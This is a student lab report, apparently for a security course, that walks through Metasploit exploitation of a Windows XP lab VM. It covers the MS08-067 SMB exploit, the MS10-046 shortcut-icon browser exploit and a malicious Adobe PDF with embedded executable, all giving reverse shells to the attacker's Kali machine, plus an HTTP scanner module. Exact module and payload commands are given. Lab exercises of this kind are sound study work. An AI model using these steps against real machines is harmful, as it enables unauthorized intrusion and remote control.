博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
Exp5 MSF基础应用
阅读量:7107 次
发布时间:2019-06-28

本文共 1572 字,大约阅读时间需要 5 分钟。

MS08_067漏洞渗透攻击(主动攻击)

这个实验使用winXPenSP3为靶机,并且只能用它当靶机。。。。并且确保两台虚拟机在同一网段。

1.打开终端,输入msfconsole
889835-20180424113254896-2071784943.png

2.输入命令use exploit/windows/smb/ms08_067_netapi,使用MS08_067漏洞模块;

3.使用命令set payload generic/shell_reverse_tcp指定攻击有效载荷;
4.设置具体参数:
set LHOST Kali的IP set RHOST Windows的IP;

5.输入show options查看所有参数是否设置正确

889835-20180424113408781-52248154.png

6.最后发起攻击输入exploit

889835-20180424113446155-285754411.png

MS11050安全漏洞(IE浏览器渗透攻击)

使用免考xp sp3为靶机;

首先得确保两台机子在同一网段内,如果不在就手动修改;
和上一步一样,首先终端中打开msfconsole
889835-20180425160230349-537278511.png
利用指令search ms10_046找到可以攻击的模块
889835-20180425160441668-1345545541.png

输入命令use exploit/windows/browser/ms10_046_shortcut_icon_dllloader

使用 set payload windows/meterpreter/reverse_tcp设置payload,并使用show options查看参数:

889835-20180425162235538-2117473671.png

最后下令发起攻击exploit

889835-20180425160742544-1112484225.png

复制local IP,在靶机上使用IE浏览器进行访问:

889835-20180425162457707-711307356.png

此时返回kali

889835-20180425162613473-2036380092.png

使用 sessions -i 1 选择会话1,成功获取了靶机的shell,利用 systeminfo 指令查看靶机的系统信息:

889835-20180425162720880-656205196.png

对Adobe的漏洞攻击

输入search adobe查询和adobe漏洞有关的模块

exploit/windows/fileformat/adobe_pdf_embedded_exe作为选择,然后show payloads查看payload
889835-20180425163208741-277551273.png
输入命令use exploit/windows/fileformat/adobe_pdf_embedded_exe
选择windows/meterpreter/reverse_tcp 作为攻击载荷并输入命令 set windows/meterpreter/reverse_tcp
接着继续查看参数
889835-20180425164747784-389552693.png
输入set LHOST Kali的IP,接着exploit进行攻击
889835-20180425164949659-1414727268.png
会生成一个pdf文件,我们需要找到它并将文件拷贝至windows XP下。

这个pdf文件是在隐藏文件夹中,所以我们需要在文件夹选项中选中查看隐藏文件。

889835-20180427135822953-1502406986.png

输入命令进行监听回连

889835-20180502105742916-309070190.png

辅助模块的应用

输入命令show auxiliary查看辅助模块

在这里我使用scanner/http/options
接着输入命令use scanner/http/options之后输入info查看信息
889835-20180502105232332-1293886875.png
设置完参数后执行
889835-20180502105322218-1226577013.png

基础问题回答

用自己的话解释什么是exploit,payload,encode:

exploit:攻击手段,是能使攻击武器(payload)的方法;

payload:攻击武器,真正具有攻击性的代码;
encode:编码方式,根据payload将要被放置的环境选择合适的编码方式,使它能够正常的运行,如:消除所有的“0x00”;

实验体会

这个实验让我知道了平时杀毒软件提示有高危漏洞,这些漏洞是如何被别人利用从而达到攻击你电脑的目的的,但是只能通过特定的漏洞攻击特定的电脑,不知道什么时候我们也能熟练利用各种漏洞攻击各种电脑。还有就是,做这个实验还是需要一个好的实验环境的。。。我的kali做到一半时突然不能联网了。。。重启大法也没有用,最后又莫名能连上了。。。

转载于:https://www.cnblogs.com/20145237fhn/p/8927190.html

你可能感兴趣的文章
嘿!不用太过于担心的单点故障
查看>>
修改Ubuntu的aptget源为阿里源的方法
查看>>
Android Camera2 拍照入门学习
查看>>
Maven镜像更换为阿里云中央仓库
查看>>
.NET+PostgreSQL实践与避坑指南
查看>>
pandas DataFrame(1)
查看>>
CopyOnWriteArraySet源码解析
查看>>
找工作面试会遇到哪些坑(社招篇)
查看>>
几种交换两个数函数(swap函数)的写法和解析
查看>>
cloudera安装hadoop集群和相关服务
查看>>
手机归属地查询-IP地址查询-身份证查询-域名备案查询--Api接口
查看>>
创建多个Oracle数据库及相应的实例
查看>>
String与StringBuilder - 字符串的轻重量级
查看>>
【转】XCode 4 制作静态库详解
查看>>
复杂产品的响应式设计【流程篇】 (转)
查看>>
JAVA JComboBox的监听事件(ActionListener、ItemListener)
查看>>
北志贺滑雪照片1
查看>>
Miller-Rabin素数测试学习小计
查看>>
ogre世界坐标鱼屏幕坐标相互转换
查看>>
Matlab Toolbox for Dimensionality Reduction (v0.7.2 - November 2010)
查看>>